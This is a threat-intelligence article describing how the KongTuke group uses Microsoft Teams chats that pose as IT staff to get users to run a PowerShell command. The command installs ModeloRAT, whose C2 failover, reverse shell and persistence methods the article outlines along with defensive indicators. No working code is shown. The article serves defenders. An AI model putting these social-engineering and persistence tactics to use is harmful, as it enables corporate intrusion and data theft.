KongTuke hackers now use Microsoft Teams for corporate breaches

KongTuke Hackers Now Use Microsoft Teams For Corporate Breaches

Executive Summary

• A new tactic from the initial access broker group KongTuke leverages Microsoft Teams to conduct social engineering attacks aimed at corporate networks.
• The method can establish a persistent foothold in under five minutes, starting from a targeted chat and a single PowerShell command.
• The payload delivered is ModeloRAT, a Python-based malware that has appeared in prior campaigns but has evolved to be more resilient and multi-path in its operation.
• The campaign has been active since at least April 2026, with KongTuke rotating through five Microsoft 365 tenants to avoid automated blocking.

The Rise of Collaboration-Platform Attacks

• Increasing use of collaboration tools: Attackers are increasingly using Microsoft Teams as a channel to reach employees and pose as IT or helpdesk staff.
• Social engineering via trusted platforms: By appearing to come from internal IT channels, attackers lower user suspicion and increase the likelihood of executing malicious commands.
• Quick transition to persistence: A single external Teams chat can move an operator from cold outreach to a persistent foothold in a matter of minutes.

Attack Vector and Social Engineering Tactics

• Initial access through Teams: The attacker engages a target in Teams chat, then tricks the user into running a malicious PowerShell command.
• Impersonation techniques: Unicode whitespace tricks are used to make the operator’s display name appear legitimate, aiding trust and reducing suspicion.
• One-click risk: The user is enticed to paste or execute a command that initiates the campaign rather than being loaded from a malicious attachment or link alone.

Delivery Chain and Payload Deployment

• PowerShell as the entry point: A single PowerShell command is shared via Teams to initiate the attack sequence.
• Payload download: The command downloads a ZIP archive from Dropbox containing a portable WinPython environment.
• ModeloRAT execution: The ZIP extracts and launches the Python-based ModeloRAT (Pmanager.py) on the host system.
• Capabilities of ModeloRAT: System and user information collection, screenshots, and potential exfiltration of files from the host filesystem.

ModeloRAT: Evolution and Capabilities

• Three key upgrades observed by researchers:1) A more resilient command-and-control (C2) architecture with a five-server pool, automatic failover, randomized URL paths, and self-update capability.2) Multiple independent access paths, including a primary RAT, a reverse shell, and a TCP backdoor, running on separate infrastructure to preserve access if one channel is disrupted.3) Expanded persistence mechanisms, including Run keys, Startup shortcuts, VBScript launchers, and SYSTEM-level scheduled tasks that may survive standard cleanup.
• Self-destruct caveats: The implant’s self-destruct routine does not remove the scheduled task, allowing persistence to survive reboots even after other components are wiped.
• Data and actions: The malware collects telemetry about the system, captures screenshots, and can exfiltrate files from the host, enabling both surveillance and data theft.

Campaign Footprint and Evasion Techniques

• Timeline and scope: Active since at least April 2026, with rapid churn across environments to evade detection.
• Tenant rotation: KongTuke rotates through five Microsoft 365 tenants, a tactic designed to avoid automated blocks and to maximize success across targets.
• Defense evasion: The use of multiple tenants and persistence mechanisms complicates detection and remediation efforts.

Defense Observations and Indicators of Compromise

• External Teams chats as foothold indicators: Persistent, unusual external communications via Teams can signal compromise when paired with suspicious commands.
• PowerShell misuse patterns: Look for unusual PowerShell commands that download and execute payloads from cloud storage services.
• Cross-tenant activity: Repeated access patterns across multiple tenants within a short time frame may indicate IAB-driven campaigns.
• Lockstep persistence artifacts: Run keys, Startup shortcuts, VBScript launchers, and scheduled tasks that survive standard cleanup procedures.
• Display name spoofing indicators: Unicode whitespace and other typographic tricks used to mimic legitimate IT staff.

Defensive Notes and Detection Opportunities

• Network and identity controls: Consider policies that restrict or monitor collaboration-platform outreach from untrusted sources.
• Threat hunting guidance: Investigate for the presence of the ModeloRAT family, unusual ZIP downloads from cloud storage, and Python-based payloads that appear after PowerShell execution.
• Forensic considerations: Prioritize traces of cross-tenant activity, multiple C2 paths, and scheduled tasks that survive reboots as indicators to verify persistence.

Visual Aids and Artifacts

• The campaign includes visual references to the PowerShell payload, the ZIP download chain, and the persistent scheduled task, illustrating the flow from initial contact to persistence and data access.

Implications for Organizations

• Collaboration tools as attack surfaces: The shift from web-based lures to platform-based social engineering represents a broadened attack surface for initial access.
• Rapid foothold capability: A compact sequence from outreach to persistence in under five minutes highlights the need for rapid detection and containment.
• Multi-path persistence risk: The combination of multiple RAT variants and diverse persistence mechanisms complicates cleanup and long-term remediation.

Notes on Campaign Context

• The described activity marks a notable evolution in KongTuke’s tactics, expanding beyond prior web-based lures to leverage a widely used enterprise collaboration platform for initial access.
• The observed behavior emphasizes the importance of monitoring and contextualizing unusual activity across Teams, PowerShell usage, and cross-tenant access patterns to identify suspicious campaigns early.